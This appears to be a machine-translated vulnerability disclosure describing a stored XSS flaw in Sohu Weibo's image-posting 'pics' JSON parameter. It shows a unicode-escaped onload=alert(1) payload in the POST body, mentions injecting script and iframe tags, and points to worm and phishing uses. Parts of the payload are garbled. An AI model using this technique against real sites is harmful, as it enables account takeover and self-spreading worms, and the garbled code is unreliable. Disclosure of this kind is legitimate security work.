XSS is a storage type on the homepage of Sohu Weibo. It can be used to plug in anything, such as worms, fans, and phishing.

Vulnerability cause: pics in post data are not filtered \ vulnerability impact: you can insert any code, A wide range of worms, fans, phishing, etc. can be found in the pics parameter of the image published by Sohu Weibo. The following is a common post data msg sharing image pics [{"url ":" http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg "," ExtraData ": {" smallest ": {" w ": 90," h ": 120," size ": 5010}," small ": {" w ": 160, "h": 213, "size": 11146}, "middle": {"w": 312, "h": 416, "size": 24486 }, "big": {"w": 312, "h": 416, "size": 24486 }}] You Can See That pics are sent in json format. 2. I tested \ here, because in js, the \ + ASCII code can be used to represent any character, which is not filtered out. Then add the "onload =" alert (1) js Code (that's what I call it) form to the jpg of the url parameter, post data becomes the following code: msg share image pics [{"url ":" http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg \ U0022 \ Users \ u006f \ u0061 \ u0064 \ u003d \ u0022 \ u0061 \ Users \ u0065 \ u0072 \ u0074 \ u0028 \ u0031 \ u0029 "," extraData ": {"smallest": {"w": 90, "h": 120, "size": 5010}, "small": {"w": 160, "h ": 213, "size": 11146}, "middle": {"w": 312, "h": 416, "size": 24486}, "big ": {"w": 312, "h": 416, "size": 24486 }}] ps: You can use the gainover tool to convert JavaScript code. http://app.baidu.com/app/enter?appid=280383 The code is successfully inserted. Figure 1 is displayed. 3. Then, the labels such as , <iframe>, and <script> are tested respectively, it indicates that the data is successfully inserted without any pressure. (If there is a successful insertion, you can use Google's F12 browser to distinguish it by color or copy it to an external txt file.) Figure 2 3 4 insert insert <iframe> insert <script>


4. As shown above, attackers can call arbitrary external js files. Because the post data does not contain keys, tokens, and so on, worms indicate no pressure. For details about the use of worms and followers, please refer to @ imlonghao's post WooYun: storage squirrel at a place on Sohu Weibo + by the way, it's okay to mention the related interface without adding TOKEN 5 cookie, it can be stolen, but Sohu Weibo is http-only. It is useless and cannot be accessed (however, accounts and passwords can be obtained by forging phishing pages ). It's better to be a worm. 6. Finally, I don't want to have a gift. I just want to give rank enough. Don't give me a 5 rank refresh without replying to anything, because it does have a huge impact !~Solution:

Filter \